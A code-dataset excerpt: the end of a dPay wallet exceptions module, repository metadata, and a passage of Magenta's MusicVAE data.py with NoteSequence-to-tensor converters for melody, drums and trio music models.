""" The transaction requires signature of a higher authority
"""
pass
class VotingInvalidOnArchivedPost(Exception):
""" The transaction requires signature of a higher authority
"""
pass
class MissingKeyError(Exception):
""" A required key couldn't be found in the wallet
"""
pass
class InvalidWifError(Exception):
""" The provided private Key has an invalid format
"""
pass
class BlockDoesNotExistsException(Exception):
""" The block does not exist
"""
pass
class NoWalletException(Exception):
""" No Wallet could be found, please use :func:`dpay.wallet.create` to
create a new wallet
"""
pass
class WitnessDoesNotExistsException(Exception):
""" The witness does not exist
"""
pass
class ContentDoesNotExistsException(Exception):
""" The content does not exist
"""
pass
class VoteDoesNotExistsException(Exception):
""" The vote does not exist
"""
pass
class WrongMasterPasswordException(Exception):
""" The password provided could not properly unlock the wallet
"""
pass
class VestingBalanceDoesNotExistsException(Exception):
""" Vesting Balance does not exist
"""
pass
class InvalidMessageSignature(Exception):
""" The message signature does not fit the message
"""
pass
class NoWriteAccess(Exception):
""" Cannot store to sqlite3 database due to missing write access
"""
pass
class BatchedCallsNotSupported(Exception):
""" Batch calls do not work
"""
pass
class BlockWaitTimeExceeded(Exception):
""" Wait time for new block exceeded
"""
pass
|
[
"jaredricelegal@gmail.com"
] |
jaredricelegal@gmail.com
|
b29f17221b216cea2a7f3cddbe1c3513bde59920
|
ef3568b08d0e99f57a0feb2882f2c65c1e97dd80
|
/magenta/models/music_vae/data.py
|
d176d7c4eec90f8fd229ef4b2f8ea9a7be9128ba
|
[
"Apache-2.0"
] |
permissive
|
SeanHsieh/magenta
|
ccf6d31ad93b036fb93f16d7ab387e0670f934db
|
9794130b40d6e8131a7d6dd9698d935633c5d4cc
|
refs/heads/master
| 2021-04-27T13:26:23.952856
| 2018-02-22T00:36:30
| 2018-02-22T00:36:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 42,363
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MusicVAE data library."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import copy
import functools
import itertools
import random
# internal imports
import numpy as np
import tensorflow as tf
import magenta.music as mm
from magenta.music import chord_symbols_lib
from magenta.music import drums_encoder_decoder
from magenta.music import sequences_lib
from magenta.protobuf import music_pb2
PIANO_MIN_MIDI_PITCH = 21
PIANO_MAX_MIDI_PITCH = 108
MIN_MIDI_PITCH = 0
MAX_MIDI_PITCH = 127
MIDI_PITCHES = 128
MAX_INSTRUMENT_NUMBER = 127
MEL_PROGRAMS = range(0, 32) # piano, chromatic percussion, organ, guitar
BASS_PROGRAMS = range(32, 40)
ELECTRIC_BASS_PROGRAM = 33
REDUCED_DRUM_PITCH_CLASSES = drums_encoder_decoder.DEFAULT_DRUM_TYPE_PITCHES
FULL_DRUM_PITCH_CLASSES = [ # 61 classes
[p] for c in drums_encoder_decoder.DEFAULT_DRUM_TYPE_PITCHES for p in c]
CHORD_SYMBOL = music_pb2.NoteSequence.TextAnnotation.CHORD_SYMBOL
def _maybe_pad_seqs(seqs, dtype):
"""Pads sequences to match the longest and returns as a numpy array."""
if not len(seqs): # pylint:disable=g-explicit-length-test
return np.zeros((0, 0, 0), dtype)
lengths = [len(s) for s in seqs]
if len(set(lengths)) == 1:
return np.array(seqs, dtype)
else:
length = max(lengths)
return (np.array([np.pad(s, [(0, length - len(s)), (0, 0)], mode='constant')
for s in seqs], dtype))
def _extract_instrument(note_sequence, instrument):
extracted_ns = copy.copy(note_sequence)
del extracted_ns.notes[:]
extracted_ns.notes.extend(
n for n in note_sequence.notes if n.instrument == instrument)
return extracted_ns
def np_onehot(indices, depth, dtype=np.bool):
"""Converts 1D array of indices to a one-hot 2D array with given depth."""
onehot_seq = np.zeros((len(indices), depth), dtype=dtype)
onehot_seq[np.arange(len(indices)), indices] = 1.0
return onehot_seq
class NoteSequenceAugmenter(object):
"""Class for augmenting NoteSequences.
Args:
transpose_range: A tuple containing the inclusive, integer range of
transpose amounts to sample from. If None, no transposition is applied.
stretch_range: A tuple containing the inclusive, float range of stretch
amounts to sample from.
Returns:
The augmented NoteSequence.
"""
def __init__(self, transpose_range=None, stretch_range=None):
self._transpose_range = transpose_range
self._stretch_range = stretch_range
def augment(self, note_sequence):
"""Python implementation that augments the NoteSequence."""
trans_amt = (random.randint(*self._transpose_range)
if self._transpose_range else 0)
stretch_factor = (random.uniform(*self._stretch_range)
if self._stretch_range else 1.0)
augmented_ns = copy.deepcopy(note_sequence)
del augmented_ns.notes[:]
for note in note_sequence.notes:
aug_pitch = note.pitch
if not note.is_drum:
aug_pitch += trans_amt
if MIN_MIDI_PITCH <= aug_pitch <= MAX_MIDI_PITCH:
augmented_ns.notes.add().CopyFrom(note)
augmented_ns.notes[-1].pitch = aug_pitch
for ta in augmented_ns.text_annotations:
if ta.annotation_type == CHORD_SYMBOL and ta.text != mm.NO_CHORD:
try:
figure = chord_symbols_lib.transpose_chord_symbol(ta.text, trans_amt)
except chord_symbols_lib.ChordSymbolException:
tf.logging.warning('Unable to transpose chord symbol: %s', ta.text)
figure = mm.NO_CHORD
ta.text = figure
augmented_ns = sequences_lib.stretch_note_sequence(
augmented_ns, stretch_factor)
return augmented_ns
def tf_augment(self, note_sequence_scalar):
"""TF op that augments the NoteSequence."""
def _augment_str(note_sequence_str):
note_sequence = music_pb2.NoteSequence.FromString(note_sequence_str)
augmented_ns = self.augment(note_sequence)
return [augmented_ns.SerializeToString()]
augmented_note_sequence_scalar = tf.py_func(
_augment_str,
[note_sequence_scalar],
tf.string,
name='augment')
augmented_note_sequence_scalar.set_shape(())
return augmented_note_sequence_scalar
class ConverterTensors(collections.namedtuple(
'ConverterTensors', ['inputs', 'outputs', 'controls', 'lengths'])):
"""Tuple of tensors output by `to_tensors` method in converters.
Attributes:
inputs: Input tensors to feed to the encoder.
outputs: Output tensors to feed to the decoder.
controls: (Optional) tensors to use as controls for both encoding and
decoding.
lengths: Length of each input/output/control sequence.
"""
def __new__(cls, inputs=None, outputs=None, controls=None, lengths=None):
if inputs is None:
inputs = []
if outputs is None:
outputs = []
if lengths is None:
lengths = [len(i) for i in inputs]
if not controls:
controls = [np.zeros([l, 0]) for l in lengths]
return super(ConverterTensors, cls).__new__(
cls, inputs, outputs, controls, lengths)
class BaseConverter(object):
"""Base class for data converters between items and tensors.
Inheriting classes must implement the following abstract methods:
-`_to_tensors`
-`_to_items`
"""
__metaclass__ = abc.ABCMeta
def __init__(self, input_depth, input_dtype, output_depth, output_dtype,
control_depth=0, control_dtype=np.bool, end_token=None,
max_tensors_per_item=None,
str_to_item_fn=lambda s: s, length_shape=()):
"""Initializes BaseConverter.
Args:
input_depth: Depth of final dimension of input (encoder) tensors.
input_dtype: DType of input (encoder) tensors.
output_depth: Depth of final dimension of output (decoder) tensors.
output_dtype: DType of output (decoder) tensors.
control_depth: Depth of final dimension of control tensors, or zero if not
conditioning on control tensors.
control_dtype: DType of control tensors.
end_token: Optional end token.
max_tensors_per_item: The maximum number of outputs to return for each
input.
str_to_item_fn: Callable to convert raw string input into an item for
conversion.
length_shape: Shape of length returned by `to_tensor`.
"""
self._input_depth = input_depth
self._input_dtype = input_dtype
self._output_depth = output_depth
self._output_dtype = output_dtype
self._control_depth = control_depth
self._control_dtype = control_dtype
self._end_token = end_token
self._max_tensors_per_input = max_tensors_per_item
self._str_to_item_fn = str_to_item_fn
self._is_training = False
self._length_shape = length_shape
@property
def is_training(self):
return self._is_training
@property
def str_to_item_fn(self):
return self._str_to_item_fn
@is_training.setter
def is_training(self, value):
self._is_training = value
@property
def max_tensors_per_item(self):
return self._max_tensors_per_input
@max_tensors_per_item.setter
def max_tensors_per_item(self, value):
self._max_tensors_per_input = value
@property
def end_token(self):
"""End token, or None."""
return self._end_token
@property
def input_depth(self):
"""Dimension of inputs (to encoder) at each timestep of the sequence."""
return self._input_depth
@property
def input_dtype(self):
"""DType of inputs (to encoder)."""
return self._input_dtype
@property
def output_depth(self):
"""Dimension of outputs (from decoder) at each timestep of the sequence."""
return self._output_depth
@property
def output_dtype(self):
"""DType of outputs (from decoder)."""
return self._output_dtype
@property
def control_depth(self):
"""Dimension of control inputs at each timestep of the sequence."""
return self._control_depth
@property
def control_dtype(self):
"""DType of control inputs."""
return self._control_dtype
@property
def length_shape(self):
"""Shape of length returned by `to_tensor`."""
return self._length_shape
@abc.abstractmethod
def _to_tensors(self, item):
"""Implementation that converts item into encoder/decoder tensors.
Args:
item: Item to convert.
Returns:
A ConverterTensors struct containing encoder inputs, decoder outputs,
(optional) control tensors used for both encoding and decoding, and
sequence lengths.
"""
pass
@abc.abstractmethod
def _to_items(self, samples, controls=None):
"""Implementation that decodes model samples into list of items."""
pass
def _maybe_sample_outputs(self, outputs):
"""If should limit outputs, returns up to limit (randomly if training)."""
if (not self.max_tensors_per_item or
len(outputs) <= self.max_tensors_per_item):
return outputs
if self.is_training:
indices = set(np.random.choice(
len(outputs), size=self.max_tensors_per_item, replace=False))
return [outputs[i] for i in indices]
else:
return outputs[:self.max_tensors_per_item]
def to_tensors(self, item):
"""Python method that converts `item` into list of tensors."""
tensors = self._to_tensors(item)
sampled_results = self._maybe_sample_outputs(list(zip(*tensors)))
return (ConverterTensors(*zip(*sampled_results))
if sampled_results else ConverterTensors())
def _combine_to_tensor_results(self, to_tensor_results):
"""Combines the results of multiple to_tensors calls into one result."""
results = []
for result in to_tensor_results:
results.extend(zip(*result))
sampled_results = self._maybe_sample_outputs(results)
return (ConverterTensors(*zip(*sampled_results))
if sampled_results else ConverterTensors())
def to_items(self, samples, controls=None):
"""Python method that decodes samples into list of items."""
if controls is None:
return self._to_items(samples)
else:
return self._to_items(samples, controls)
def tf_to_tensors(self, item_scalar):
"""TensorFlow op that converts item into output tensors.
Sequences will be padded to match the length of the longest.
Args:
item_scalar: A scalar of type tf.String containing the raw item to be
converted to tensors.
Returns:
inputs: A Tensor, shaped [num encoded seqs, max(lengths), input_depth],
containing the padded input encodings.
outputs: A Tensor, shaped [num encoded seqs, max(lengths), output_depth],
containing the padded output encodings resulting from the input.
controls: A Tensor, shaped
[num encoded seqs, max(lengths), control_depth], containing the padded
control encodings.
lengths: A tf.int32 Tensor, shaped [num encoded seqs], containing the
unpadded lengths of the tensor sequences resulting from the input.
"""
def _convert_and_pad(item_str):
item = self.str_to_item_fn(item_str)
tensors = self.to_tensors(item)
inputs = _maybe_pad_seqs(tensors.inputs, self.input_dtype)
outputs = _maybe_pad_seqs(tensors.outputs, self.output_dtype)
controls = _maybe_pad_seqs(tensors.controls, self.control_dtype)
return inputs, outputs, controls, np.array(tensors.lengths, np.int32)
inputs, outputs, controls, lengths = tf.py_func(
_convert_and_pad,
[item_scalar],
[self.input_dtype, self.output_dtype, self.control_dtype, tf.int32],
name='convert_and_pad')
inputs.set_shape([None, None, self.input_depth])
outputs.set_shape([None, None, self.output_depth])
controls.set_shape([None, None, self.control_depth])
lengths.set_shape([None] + list(self.length_shape))
return inputs, outputs, controls, lengths
def preprocess_notesequence(note_sequence, presplit_on_time_changes):
"""Preprocesses a single NoteSequence, resulting in multiple sequences."""
if presplit_on_time_changes:
note_sequences = sequences_lib.split_note_sequence_on_time_changes(
note_sequence)
else:
note_sequences = [note_sequence]
return note_sequences
class BaseNoteSequenceConverter(BaseConverter):
"""Base class for NoteSequence data converters.
Inheriting classes must implement the following abstract methods:
-`_to_tensors`
-`_to_notesequences`
"""
__metaclass__ = abc.ABCMeta
def __init__(self, input_depth, input_dtype, output_depth, output_dtype,
control_depth=0, control_dtype=np.bool, end_token=None,
presplit_on_time_changes=True,
max_tensors_per_notesequence=None):
"""Initializes BaseNoteSequenceConverter.
Args:
input_depth: Depth of final dimension of input (encoder) tensors.
input_dtype: DType of input (encoder) tensors.
output_depth: Depth of final dimension of output (decoder) tensors.
output_dtype: DType of output (decoder) tensors.
control_depth: Depth of final dimension of control tensors, or zero if not
conditioning on control tensors.
control_dtype: DType of control tensors.
end_token: Optional end token.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
super(BaseNoteSequenceConverter, self).__init__(
input_depth, input_dtype, output_depth, output_dtype,
control_depth, control_dtype, end_token,
max_tensors_per_item=max_tensors_per_notesequence,
str_to_item_fn=music_pb2.NoteSequence.FromString)
self._presplit_on_time_changes = presplit_on_time_changes
@property
def max_tensors_per_notesequence(self):
return self.max_tensors_per_item
@max_tensors_per_notesequence.setter
def max_tensors_per_notesequence(self, value):
self.max_tensors_per_item = value
@abc.abstractmethod
def _to_notesequences(self, samples, controls=None):
"""Implementation that decodes model samples into list of NoteSequences."""
pass
def to_notesequences(self, samples, controls=None):
"""Python method that decodes samples into list of NoteSequences."""
return self._to_items(samples, controls)
def to_tensors(self, note_sequence):
"""Python method that converts `note_sequence` into list of tensors."""
note_sequences = preprocess_notesequence(
note_sequence, self._presplit_on_time_changes)
results = []
for ns in note_sequences:
results.append(super(BaseNoteSequenceConverter, self).to_tensors(ns))
return self._combine_to_tensor_results(results)
def _to_items(self, samples, controls=None):
"""Python method that decodes samples into list of NoteSequences."""
if controls is None:
return self._to_notesequences(samples)
else:
return self._to_notesequences(samples, controls)
class LegacyEventListOneHotConverter(BaseNoteSequenceConverter):
"""Converts NoteSequences using legacy OneHotEncoding framework.
Quantizes the sequences, extracts event lists in the requested size range,
uniquifies, and converts to encoding. Uses the OneHotEncoding's
output encoding for both the input and output.
Args:
event_list_fn: A function that returns a new EventSequence.
event_extractor_fn: A function for extracing events into EventSequences. The
sole input should be the quantized NoteSequence.
legacy_encoder_decoder: An instantiated OneHotEncoding object to use.
add_end_token: Whether or not to add an end token. Recommended to be False
for fixed-length outputs.
slice_bars: Optional size of window to slide over raw event lists after
extraction.
steps_per_quarter: The number of quantization steps per quarter note.
Mututally exclusive with `steps_per_second`.
steps_per_second: The number of quantization steps per second.
Mututally exclusive with `steps_per_quarter`.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
"""
def __init__(self, event_list_fn, event_extractor_fn,
legacy_encoder_decoder, add_end_token=False, slice_bars=None,
slice_steps=None, steps_per_quarter=None, steps_per_second=None,
quarters_per_bar=4, pad_to_total_time=False,
max_tensors_per_notesequence=None,
presplit_on_time_changes=True):
if (steps_per_quarter, steps_per_second).count(None) != 1:
raise ValueError(
'Exactly one of `steps_per_quarter` and `steps_per_second` should be '
'provided.')
if (slice_bars, slice_steps).count(None) == 0:
raise ValueError(
'At most one of `slice_bars` and `slice_steps` should be provided.')
self._event_list_fn = event_list_fn
self._event_extractor_fn = event_extractor_fn
self._legacy_encoder_decoder = legacy_encoder_decoder
self._steps_per_quarter = steps_per_quarter
if steps_per_quarter:
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._steps_per_second = steps_per_second
if slice_bars:
self._slice_steps = self._steps_per_bar * slice_bars
else:
self._slice_steps = slice_steps
self._pad_to_total_time = pad_to_total_time
depth = legacy_encoder_decoder.num_classes + add_end_token
super(LegacyEventListOneHotConverter, self).__init__(
input_depth=depth,
input_dtype=np.bool,
output_depth=depth,
output_dtype=np.bool,
end_token=legacy_encoder_decoder.num_classes if add_end_token else None,
presplit_on_time_changes=presplit_on_time_changes,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
"""Converts NoteSequence to unique, one-hot tensor sequences."""
try:
if self._steps_per_quarter:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
else:
quantized_sequence = mm.quantize_note_sequence_absolute(
note_sequence, self._steps_per_second)
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
mm.NegativeTimeException) as e:
return ConverterTensors()
event_lists, unused_stats = self._event_extractor_fn(quantized_sequence)
if self._pad_to_total_time:
for e in event_lists:
e.set_length(len(e) + e.start_step, from_left=True)
e.set_length(quantized_sequence.total_quantized_steps)
if self._slice_steps:
sliced_event_tuples = []
for l in event_lists:
for i in range(self._slice_steps, len(l) + 1, self._steps_per_bar):
sliced_event_tuples.append(tuple(l[i - self._slice_steps: i]))
else:
sliced_event_tuples = [tuple(l) for l in event_lists]
# TODO(adarob): Consider handling the fact that different event lists can
# be mapped to identical tensors by the encoder_decoder (e.g., Drums).
unique_event_tuples = list(set(sliced_event_tuples))
unique_event_tuples = self._maybe_sample_outputs(unique_event_tuples)
seqs = []
for t in unique_event_tuples:
seqs.append(np_onehot(
[self._legacy_encoder_decoder.encode_event(e) for e in t] +
([] if self.end_token is None else [self.end_token]),
self.output_depth, self.output_dtype))
return ConverterTensors(inputs=seqs, outputs=seqs)
def _to_notesequences(self, samples):
output_sequences = []
for sample in samples:
s = np.argmax(sample, axis=-1)
if self.end_token is not None and self.end_token in s.tolist():
s = s[:s.tolist().index(self.end_token)]
event_list = self._event_list_fn()
for e in s:
assert e != self.end_token
event_list.append(self._legacy_encoder_decoder.decode_event(e))
output_sequences.append(event_list.to_sequence(velocity=80))
return output_sequences
class OneHotMelodyConverter(LegacyEventListOneHotConverter):
"""Converter for legacy MelodyOneHotEncoding.
Args:
min_pitch: The minimum pitch to model. Those below this value will be
ignored.
max_pitch: The maximum pitch to model. Those above this value will be
ignored.
valid_programs: Optional set of program numbers to allow.
skip_polyphony: Whether to skip polyphonic instruments. If False, the
highest pitch will be taken in polyphonic sections.
max_bars: Optional maximum number of bars per extracted melody, before
slicing.
slice_bars: Optional size of window to slide over raw Melodies after
extraction.
gap_bars: If this many bars or more of non-events follow a note event, the
melody is ended. Disabled when set to 0 or None.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
add_end_token: Whether to add an end token at the end of each sequence.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
def __init__(self, min_pitch=PIANO_MIN_MIDI_PITCH,
max_pitch=PIANO_MAX_MIDI_PITCH, valid_programs=None,
skip_polyphony=False, max_bars=None, slice_bars=None,
gap_bars=1.0, steps_per_quarter=4, quarters_per_bar=4,
add_end_token=False, pad_to_total_time=False,
max_tensors_per_notesequence=5, presplit_on_time_changes=True):
self._min_pitch = min_pitch
self._max_pitch = max_pitch
self._valid_programs = valid_programs
steps_per_bar = steps_per_quarter * quarters_per_bar
max_steps_truncate = steps_per_bar * max_bars if max_bars else None
def melody_fn():
return mm.Melody(
steps_per_bar=steps_per_bar, steps_per_quarter=steps_per_quarter)
melody_extractor_fn = functools.partial(
mm.extract_melodies,
min_bars=1,
gap_bars=gap_bars or float('inf'),
max_steps_truncate=max_steps_truncate,
min_unique_pitches=1,
ignore_polyphonic_notes=not skip_polyphony,
pad_end=True)
super(OneHotMelodyConverter, self).__init__(
melody_fn,
melody_extractor_fn,
mm.MelodyOneHotEncoding(min_pitch, max_pitch + 1),
add_end_token=add_end_token,
slice_bars=slice_bars,
pad_to_total_time=pad_to_total_time,
steps_per_quarter=steps_per_quarter,
quarters_per_bar=quarters_per_bar,
max_tensors_per_notesequence=max_tensors_per_notesequence,
presplit_on_time_changes=presplit_on_time_changes)
def _to_tensors(self, note_sequence):
def is_valid(note):
if (self._valid_programs is not None and
note.program not in self._valid_programs):
return False
return self._min_pitch <= note.pitch <= self._max_pitch
notes = list(note_sequence.notes)
del note_sequence.notes[:]
note_sequence.notes.extend([n for n in notes if is_valid(n)])
return super(OneHotMelodyConverter, self)._to_tensors(note_sequence)
class DrumsConverter(BaseNoteSequenceConverter):
"""Converter for legacy drums with either pianoroll or one-hot tensors.
Inputs/outputs are either a "pianoroll"-like encoding of all possible drum
hits at a given step, or a one-hot encoding of the pianoroll.
The "roll" input encoding includes a final NOR bit (after the optional end
token).
Args:
max_bars: Optional maximum number of bars per extracted drums, before
slicing.
slice_bars: Optional size of window to slide over raw Melodies after
extraction.
gap_bars: If this many bars or more follow a non-empty drum event, the
drum track is ended. Disabled when set to 0 or None.
pitch_classes: A collection of collections, with each sub-collection
containing the set of pitches representing a single class to group by. By
default, groups valid drum pitches into 9 different classes.
add_end_token: Whether or not to add an end token. Recommended to be False
for fixed-length outputs.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
pad_to_total_time: Pads each input/output tensor to the total time of the
NoteSequence.
roll_input: Whether to use a pianoroll-like representation as the input
instead of a one-hot encoding.
roll_output: Whether to use a pianoroll-like representation as the output
instead of a one-hot encoding.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
presplit_on_time_changes: Whether to split NoteSequence on time changes
before converting.
"""
def __init__(self, max_bars=None, slice_bars=None, gap_bars=1.0,
pitch_classes=None, add_end_token=False, steps_per_quarter=4,
quarters_per_bar=4, pad_to_total_time=False, roll_input=False,
roll_output=False, max_tensors_per_notesequence=5,
presplit_on_time_changes=True):
self._pitch_classes = pitch_classes or REDUCED_DRUM_PITCH_CLASSES
self._pitch_class_map = {
p: i for i, pitches in enumerate(self._pitch_classes) for p in pitches}
self._steps_per_quarter = steps_per_quarter
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._slice_steps = self._steps_per_bar * slice_bars if slice_bars else None
self._pad_to_total_time = pad_to_total_time
self._roll_input = roll_input
self._roll_output = roll_output
self._drums_extractor_fn = functools.partial(
mm.extract_drum_tracks,
min_bars=1,
gap_bars=gap_bars or float('inf'),
max_steps_truncate=self._steps_per_bar * max_bars if max_bars else None,
pad_end=True)
num_classes = len(self._pitch_classes)
self._pr_encoder_decoder = mm.PianorollEncoderDecoder(
input_size=num_classes + add_end_token)
# Use pitch classes as `drum_type_pitches` since we have already done the
# mapping.
self._oh_encoder_decoder = mm.MultiDrumOneHotEncoding(
drum_type_pitches=[(i,) for i in range(num_classes)])
output_depth = (num_classes if self._roll_output else
self._oh_encoder_decoder.num_classes) + add_end_token
super(DrumsConverter, self).__init__(
input_depth=(
num_classes + 1 if self._roll_input else
self._oh_encoder_decoder.num_classes) + add_end_token,
input_dtype=np.bool,
output_depth=output_depth,
output_dtype=np.bool,
end_token=output_depth - 1 if add_end_token else None,
presplit_on_time_changes=presplit_on_time_changes,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
"""Converts NoteSequence to unique sequences."""
try:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
mm.NegativeTimeException) as e:
return ConverterTensors()
new_notes = []
for n in quantized_sequence.notes:
if not n.is_drum:
continue
if n.pitch not in self._pitch_class_map:
continue
n.pitch = self._pitch_class_map[n.pitch]
new_notes.append(n)
del quantized_sequence.notes[:]
quantized_sequence.notes.extend(new_notes)
event_lists, unused_stats = self._drums_extractor_fn(quantized_sequence)
if self._pad_to_total_time:
for e in event_lists:
e.set_length(len(e) + e.start_step, from_left=True)
e.set_length(quantized_sequence.total_quantized_steps)
if self._slice_steps:
sliced_event_tuples = []
for l in event_lists:
for i in range(self._slice_steps, len(l) + 1, self._steps_per_bar):
sliced_event_tuples.append(tuple(l[i - self._slice_steps: i]))
else:
sliced_event_tuples = [tuple(l) for l in event_lists]
unique_event_tuples = list(set(sliced_event_tuples))
unique_event_tuples = self._maybe_sample_outputs(unique_event_tuples)
rolls = []
oh_vecs = []
for t in unique_event_tuples:
if self._roll_input or self._roll_output:
if self.end_token is not None:
t_roll = list(t) + [(self._pr_encoder_decoder.input_size - 1,)]
else:
t_roll = t
rolls.append(np.vstack([
self._pr_encoder_decoder.events_to_input(t_roll, i).astype(np.bool)
for i in range(len(t_roll))]))
if not (self._roll_input and self._roll_output):
labels = [self._oh_encoder_decoder.encode_event(e) for e in t]
if self.end_token is not None:
labels += [self._oh_encoder_decoder.num_classes]
oh_vecs.append(np_onehot(
labels,
self._oh_encoder_decoder.num_classes + (self.end_token is not None),
np.bool))
if self._roll_input:
input_seqs = [
np.append(roll, np.expand_dims(np.all(roll == 0, axis=1), axis=1),
axis=1) for roll in rolls]
else:
input_seqs = oh_vecs
output_seqs = rolls if self._roll_output else oh_vecs
return ConverterTensors(inputs=input_seqs, outputs=output_seqs)
def _to_notesequences(self, samples):
output_sequences = []
for s in samples:
if self._roll_output:
if self.end_token is not None:
end_i = np.where(s[:, self.end_token])
if len(end_i): # pylint: disable=g-explicit-length-test
s = s[:end_i[0]]
events_list = [frozenset(np.where(e)[0]) for e in s]
else:
s = np.argmax(s, axis=-1)
if self.end_token is not None and self.end_token in s:
s = s[:s.tolist().index(self.end_token)]
events_list = [self._oh_encoder_decoder.decode_event(e) for e in s]
# Map classes to exemplars.
events_list = [
frozenset(self._pitch_classes[c][0] for c in e) for e in events_list]
track = mm.DrumTrack(
events=events_list, steps_per_bar=self._steps_per_bar,
steps_per_quarter=self._steps_per_quarter)
output_sequences.append(track.to_sequence(velocity=80))
return output_sequences
class TrioConverter(BaseNoteSequenceConverter):
"""Converts to/from 3-part (mel, drums, bass) multi-one-hot events.
Extracts overlapping segments with melody, drums, and bass (determined by
program number) and concatenates one-hot tensors from OneHotMelodyConverter
and OneHotDrumsConverter. Takes the cross products from the sets of
instruments of each type.
Args:
slice_bars: Optional size of window to slide over full converted tensor.
gap_bars: The number of consecutive empty bars to allow for any given
instrument. Note that this number is effectively doubled for internal
gaps.
max_bars: Optional maximum number of bars per extracted sequence, before
slicing.
steps_per_quarter: The number of quantization steps per quarter note.
quarters_per_bar: The number of quarter notes per bar.
max_tensors_per_notesequence: The maximum number of outputs to return
for each NoteSequence.
"""
class InstrumentType(object):
UNK = 0
MEL = 1
BASS = 2
DRUMS = 3
INVALID = 4
def __init__(
self, slice_bars=None, gap_bars=2, max_bars=1024, steps_per_quarter=4,
quarters_per_bar=4, max_tensors_per_notesequence=5):
self._melody_converter = OneHotMelodyConverter(
gap_bars=None, steps_per_quarter=steps_per_quarter,
pad_to_total_time=True, presplit_on_time_changes=False,
max_tensors_per_notesequence=None)
self._drums_converter = DrumsConverter(
gap_bars=None, steps_per_quarter=steps_per_quarter,
pad_to_total_time=True, presplit_on_time_changes=False,
max_tensors_per_notesequence=None)
self._slice_bars = slice_bars
self._gap_bars = gap_bars
self._max_bars = max_bars
self._steps_per_quarter = steps_per_quarter
self._steps_per_bar = steps_per_quarter * quarters_per_bar
self._split_output_depths = (
self._melody_converter.output_depth,
self._melody_converter.output_depth,
self._drums_converter.output_depth)
output_depth = sum(self._split_output_depths)
self._program_map = dict(
[(i, TrioConverter.InstrumentType.MEL) for i in MEL_PROGRAMS] +
[(i, TrioConverter.InstrumentType.BASS) for i in BASS_PROGRAMS])
super(TrioConverter, self).__init__(
input_depth=output_depth,
input_dtype=np.bool,
output_depth=output_depth,
output_dtype=np.bool,
end_token=False,
presplit_on_time_changes=True,
max_tensors_per_notesequence=max_tensors_per_notesequence)
def _to_tensors(self, note_sequence):
try:
quantized_sequence = mm.quantize_note_sequence(
note_sequence, self._steps_per_quarter)
if (mm.steps_per_bar_in_quantized_sequence(quantized_sequence) !=
self._steps_per_bar):
return ConverterTensors()
except (mm.BadTimeSignatureException, mm.NonIntegerStepsPerBarException,
mm.NegativeTimeException):
return ConverterTensors()
total_bars = int(
np.ceil(quantized_sequence.total_quantized_steps / self._steps_per_bar))
total_bars = min(total_bars, self._max_bars)
# Assign an instrument class for each instrument, and compute its coverage.
# If an instrument has multiple classes, it is considered INVALID.
instrument_type = np.zeros(MAX_INSTRUMENT_NUMBER + 1, np.uint8)
coverage = np.zeros((total_bars, MAX_INSTRUMENT_NUMBER + 1), np.bool)
for note in quantized_sequence.notes:
i = note.instrument
if i > MAX_INSTRUMENT_NUMBER:
tf.logging.warning('Skipping invalid instrument number: %d', i)
continue
inferred_type = (
self.InstrumentType.DRUMS if note.is_drum else
self._program_map.get(note.program, self.InstrumentType.INVALID))
if not instrument_type[i]:
instrument_type[i] = inferred_type
elif instrument_type[i] != inferred_type:
instrument_type[i] = self.InstrumentType.INVALID
start_bar = note.quantized_start_step // self._steps_per_bar
end_bar = int(np.ceil(note.quantized_end_step / self._steps_per_bar))
if start_bar >= total_bars:
continue
coverage[start_bar:min(end_bar, total_bars), i] = True
# Group instruments by type.
instruments_by_type = collections.defaultdict(list)
for i, type_ in enumerate(instrument_type):
if type_ not in (self.InstrumentType.UNK, self.InstrumentType.INVALID):
instruments_by_type[type_].append(i)
if len(instruments_by_type) < 3:
# This NoteSequence doesn't have all 3 types.
return ConverterTensors()
# Encode individual instruments.
# Set total time so that instruments will be padded correctly.
note_sequence.total_time = (
total_bars * self._steps_per_bar *
60 / note_sequence.tempos[0].qpm / self._steps_per_quarter)
encoded_instruments = {}
for i in (instruments_by_type[self.InstrumentType.MEL] +
instruments_by_type[self.InstrumentType.BASS]):
tensors = self._melody_converter.to_tensors(
_extract_instrument(note_sequence, i))
if tensors.outputs:
encoded_instruments[i] = tensors.outputs[0]
else:
coverage[:, i] = False
for i in instruments_by_type[self.InstrumentType.DRUMS]:
tensors = self._drums_converter.to_tensors(
_extract_instrument(note_sequence, i))
if tensors.outputs:
encoded_instruments[i] = tensors.outputs[0]
else:
